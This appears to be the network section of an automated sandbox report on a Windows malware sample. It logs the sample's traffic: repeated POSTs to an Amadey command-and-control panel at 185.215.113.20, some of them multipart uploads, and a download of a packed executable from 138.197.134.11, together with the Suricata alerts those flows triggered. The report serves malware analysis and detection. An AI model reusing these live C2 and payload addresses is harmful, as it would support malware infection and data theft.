Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
- UDP Requests
-
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62327 239.255.255.250:1900
-
192.168.56.101:62329 239.255.255.250:3702
-
192.168.56.101:62331 239.255.255.250:3702
-
192.168.56.101:62333 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
POST
200
http://185.215.113.20/gb9fskvS/index.php
REQUEST
RESPONSE
BODY
POST /gb9fskvS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.20
Content-Length: 85
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 04 Sep 2021 23:54:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 64
Content-Type: text/html; charset=UTF-8
POST
200
http://185.215.113.20/gb9fskvS/index.php?scr=1
REQUEST
RESPONSE
BODY
POST /gb9fskvS/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----860f5834f8e7f8e2834fc2957042760e
Host: 185.215.113.20
Content-Length: 23742
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 04 Sep 2021 23:54:33 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
GET
200
http://138.197.134.11/santa.clo
REQUEST
RESPONSE
BODY
GET /santa.clo HTTP/1.1
Host: 138.197.134.11
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 04 Sep 2021 23:54:33 GMT
Content-Length: 340480
Connection: keep-alive
Keep-Alive: timeout=60
Last-Modified: Fri, 03 Sep 2021 21:23:07 GMT
ETag: "53200-5cb1de7ccc4c0"
Accept-Ranges: bytes
POST
200
http://185.215.113.20/gb9fskvS/index.php
REQUEST
RESPONSE
BODY
POST /gb9fskvS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.20
Content-Length: 31
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 04 Sep 2021 23:54:50 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
POST
200
http://185.215.113.20/gb9fskvS/index.php?scr=1
REQUEST
RESPONSE
BODY
POST /gb9fskvS/index.php?scr=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----2965658b89b496b7c43d6a6ea3ac930b
Host: 185.215.113.20
Content-Length: 23739
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 04 Sep 2021 23:55:34 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
POST
200
http://185.215.113.20/gb9fskvS/index.php
REQUEST
RESPONSE
BODY
POST /gb9fskvS/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.20
Content-Length: 85
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sat, 04 Sep 2021 23:55:50 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
| Flow | SID | Signature | Category |
|---|---|---|---|
| TCP 185.215.113.20:80 -> 192.168.56.101:49212 | 2400024 | ET DROP Spamhaus DROP Listed Traffic Inbound group 25 | Misc Attack |
| TCP 138.197.134.11:80 -> 192.168.56.101:49205 | 2014819 | ET INFO Packed Executable Download | Misc activity |
| TCP 138.197.134.11:80 -> 192.168.56.101:49205 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
| TCP 138.197.134.11:80 -> 192.168.56.101:49205 | 2016538 | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download | Potentially Bad Traffic |
| TCP 138.197.134.11:80 -> 192.168.56.101:49205 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
| TCP 192.168.56.101:49200 -> 185.215.113.20:80 | 2027700 | ET MALWARE Amadey CnC Check-In | Malware Command and Control Activity Detected |
| TCP 192.168.56.101:49214 -> 185.215.113.20:80 | 2027700 | ET MALWARE Amadey CnC Check-In | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts